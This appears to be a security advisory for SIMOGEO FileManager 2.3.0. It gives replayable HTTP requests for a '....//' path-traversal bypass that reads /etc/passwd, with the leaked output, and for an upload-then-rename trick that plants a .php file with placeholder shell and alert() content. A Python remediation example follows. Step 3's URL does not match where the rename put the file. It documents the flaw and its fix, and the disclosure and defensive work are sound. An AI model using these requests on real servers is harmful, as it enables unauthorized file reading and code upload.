Bypass Filtering : "....//" -> the inner "../" is deleted and what remains is "../"

Attack Request

GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 17:18:52 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze19
Content-Transfer-Encoding: Binary
Content-Length: 1383
Content-Disposition: inline; filename="passwd"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
..snip..

###################################################

# Exploit Title: SIMOGEO FileManager 2.3.0 - File Upload Vulnerability
# Date: 2015-12-09
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: https://github.com/simogeo/Filemanager
# Software Link: git clone http://github.com/simogeo/Filemanager.git
# Version: 2.3.0
# Tested on: Debian [Wheezy]
# CVE : none

1. Upload File

POST /vul_test/target/Filemanager/connectors/php/filemanager.php?config=filemanager.config.js HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: application/json
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.15/vul_test/target/Filemanager/
Content-Length: 520
Content-Type: multipart/form-data; boundary=---------------------------1675330531498115896355630737
Connection: keep-alive
Pragma: no-cache

-----------------------------1675330531498115896355630737
Content-Disposition: form-data; name="mode"

add
-----------------------------1675330531498115896355630737
Content-Disposition: form-data; name="currentpath"

/vul_test/target/Filemanager/userfiles/
-----------------------------1675330531498115896355630737
Content-Disposition: form-data; name="newfile"; filename="shell.txt"
Content-Type: text/plain

echo "Write PHP WebShell Code";
<html><body><script>alert("45")</script></body></html>
-----------------------------1675330531498115896355630737--

2. Change File Extension (.txt -> .php or .html) & Upload Path Tampering (/userfiles -> /)

The rename action applies neither the upload extension check nor a working traversal filter to the new name:

GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=rename&old=%2Fvul_test%2Ftarget%2FFilemanager%2Fuserfiles%2Fshell.txt&new=....//shell.php&config=filemanager.config.js HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.15/vul_test/target/Filemanager/
Connection: keep-alive

3. Call Uploaded File

http://192.168.0.15/vul_test/target/Filemanager/userfiles/shell.php

Response

HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 17:25:20 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze19
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

echo "Write PHP WebShell Code";
<html><body><script>alert("45")</script></body></html>
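The `....//` bypass above works because the filter deletes `../` once and never looks at the result. The block below is an added example, not code from the Filemanager project: it reproduces the single-pass filter on the advisory's preview path, shows that looping the deletion closes this particular trick, and then shows the check that does not depend on how `../` was spelled at all, namely canonicalizing the joined path and requiring it to stay under the base directory. The base directory is an assumption; the attack path is constructed from the request shown above.

```python
import posixpath

# Assumed base directory for the file manager's user files (illustration, not from the advisory).
USERFILES = "/var/www/vul_test/target/Filemanager/userfiles"

# The advisory's preview path: nine "....//" segments, then etc/passwd.
ATTACK_PATH = "//" + "....//" * 9 + "etc/passwd"


def strip_dotdot_once(path):
    """The 2.3.0-style blacklist: every '../' deleted in a single pass.
    '....//' loses its middle '../' and what is left is '../' again."""
    return path.replace("../", "")


def strip_dotdot_until_fixed(path):
    """Repeating the deletion until nothing changes closes the '....//' trick,
    but it is still a blacklist: URL-encoded or backslash variants are not covered."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def resolve_inside(base, user_path):
    """Canonicalize the joined path and accept it only if it stays under base.
    Leading slashes are dropped first because posixpath.join(base, '/etc/passwd')
    would discard base entirely. Returns the resolved path or None."""
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


if __name__ == "__main__":
    print("after one pass :", strip_dotdot_once(ATTACK_PATH))
    print("after looping  :", strip_dotdot_until_fixed(ATTACK_PATH))
    print("confined       :", resolve_inside(USERFILES, strip_dotdot_once(ATTACK_PATH)))
    print("rename target  :", resolve_inside(USERFILES, "../shell.php"))
    print("legit file     :", resolve_inside(USERFILES, "images/a.jpg"))
```

The same `resolve_inside` check belongs on the `mode=rename` new name, where `....//shell.php` becomes `../shell.php` after the filter. In a real deployment use `os.path.realpath` on both sides of the comparison so symlinks inside the user directory cannot point out of it either; `posixpath.normpath` is used here only so the example runs without touching the filesystem.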